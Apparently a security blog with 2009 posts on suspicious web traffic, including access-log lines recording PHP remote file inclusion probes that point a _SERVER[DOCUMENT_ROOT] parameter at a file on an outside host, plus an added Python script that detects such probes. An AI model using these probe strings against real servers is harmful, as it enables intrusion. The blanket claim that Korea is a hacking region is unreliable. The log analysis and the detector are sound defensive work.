Traffic from these two networks has been monitoring one of our sites, possibly scraping content.
Rackspace.com, Ltd. RSCP-NET-4 (NET-174-143-0-0-1)
174.143.0.0 - 174.143.255.255
Slicehost RSPC-1251808572434376 (NET-174-143-180-0-1)
174.143.180.0 - 174.143.183.255
Object Software Development SEANET-CBLK (NET-199-181-164-0-1)
199.181.164.0 - 199.181.168.255
Seanet Corporation SEANET01-NET01 (NET-199-181-165-0-1)
199.181.165.0 - 199.181.167.255
Trends from the trenches of Internet traffic. Hackers, spammers and Internet abuse. IP address database. DNS sightings. Views and opinions expressed are my own. ~ Teri Radichel @teriradichel
Monday, October 19, 2009
Monday, October 12, 2009
Bad Traffic from Korea
Not sure what this nonsense is and how it is even getting directed to our server. The web addresses below are not even on our server but somehow this showed up in our logs and is generating errors:
222.231.57.31 - - [04/10/2009:10:33:45 -0800] "GET /web///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 521 "-" "Mozilla/5.0" -
222.231.57.31 - - [04/10/2009:10:33:45 -0800] "GET ///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 521 "-" "Mozilla/5.0" -
222.231.57.31 - - [04/10/2009:10:33:45 -0800] "GET /web/e-commerce///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 521 "-" "Mozilla/5.0" -
222.231.57.31 - - [04/10/2009:10:33:45 -0800] "GET /web/e-commerce/paypal///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 521 "-" "Mozilla/5.0" -
222.231.57.31 - - [04/10/2009:10:33:45 -0800] "GET /web/e-commerce/paypal/PayPal.html///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 521 "-" "Mozilla/5.0" -
This is coming from a common spamming/hacking part of the world - Korea:
inetnum: 222.231.0.0 - 222.231.63.255
netname: KIDC
descr: Korea Internet Data Center
descr: KIDC Bldg, 261-1, Nonhyun-dong, Kangnam-ku, Seoul, 135-010
country: KR
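Every request logged in this post sets a query parameter named _SERVER[DOCUMENT_ROOT] to a URL on another host, which is the shape of a PHP remote file inclusion probe. The following is an added example, not part of the original post, showing one way to flag that pattern in an access log and to separate probes that were rejected from those that got a non-error response; the sample lines, IP addresses, host names and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in the post's log format (documentation IPs, example.test host).
SAMPLE_LOG = """\
203.0.113.7 - - [04/10/2009:10:33:45 -0800] "GET /web///?_SERVER%5BDOCUMENT_ROOT%5D=http://files.example.test/id1.txt??? HTTP/1.1" 404 521 "-" "Mozilla/5.0" -
203.0.113.7 - - [04/10/2009:10:33:46 -0800] "GET /shop/index.php?GLOBALS%5Bpath%5D=ftp://files.example.test/x.txt? HTTP/1.1" 200 1840 "-" "Mozilla/5.0" -
198.51.100.9 - - [04/10/2009:10:34:02 -0800] "GET /search?q=http://example.test/page HTTP/1.1" 200 1840 "-" "Mozilla/5.0" -
198.51.100.9 - - [04/10/2009:10:34:10 -0800] "GET /web/e-commerce/paypal/PayPal.html HTTP/1.1" 200 7311 "-" "Mozilla/5.0" -
"""

# Source IP, timestamp, request target and status from one access log line.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')
# PHP superglobal names that should never arrive as request parameters.
SUPERGLOBALS = {"_SERVER", "_GET", "_POST", "_COOKIE", "_REQUEST",
                "_ENV", "_FILES", "_SESSION", "GLOBALS"}
REMOTE_URL_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)


def suspicious_params(target):
    """Return (name, url) pairs where a superglobal-named parameter holds a remote URL."""
    query = target.partition("?")[2]
    hits = []
    for pair in re.split(r"[&;]", query):
        name, _, value = pair.partition("=")
        name, value = unquote(name), unquote(value)
        if name.split("[", 1)[0] in SUPERGLOBALS and REMOTE_URL_RE.match(value):
            hits.append((name, value.rstrip("?")))  # strip trailing "?" characters
    return hits


def scan(log_text):
    """Parse each line and return one finding per suspicious parameter."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than guess
        for name, url in suspicious_params(m["target"]):
            findings.append({"ip": m["ip"], "ts": m["ts"], "status": int(m["status"]),
                             "param": name, "url": url})
    return findings


def needs_review(findings):
    """Probes answered with a non-error status deserve a closer look at the handler."""
    return [f for f in findings if f["status"] < 400]
```

A 404 on every probe, as in the post's log, means the requested paths did not exist; a finding returned by needs_review means the request reached a real page and that page's handling of request parameters should be checked.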
Saturday, October 10, 2009
Strange Traffic in Logs - a bunch from Canada
There is something bizarre going on in our logs. It is interesting that the first of such links comes from aQuantive - now Microsoft advertising.
We have a site that is running some Google advertising supposedly (did not set this up myself). There is a bunch of traffic - all from different networks in Canada - where these visitors hit that ad landing page, then jump over to another web site on our server.
For this particular company, it is highly unlikely that 10 or 20 visitors per day in Canada are clicking on their ads legitimately (if that is in fact the source).
Additionally there are strange Google redirect links in our logs, and a lot of searches in Google.ca (Google Canada) that are ending up at this site.
One thing I noticed is that initial attempts at this type of traffic were coming from international locations other than Canada, some of which we have blocked. Perhaps because they cannot get to the site via these locations they set up shop in Canada and attempt to access our site through some weird redirect through a form. Will have to keep looking into that.
The traffic started on September 1st 2009. Here are the IP addresses involved: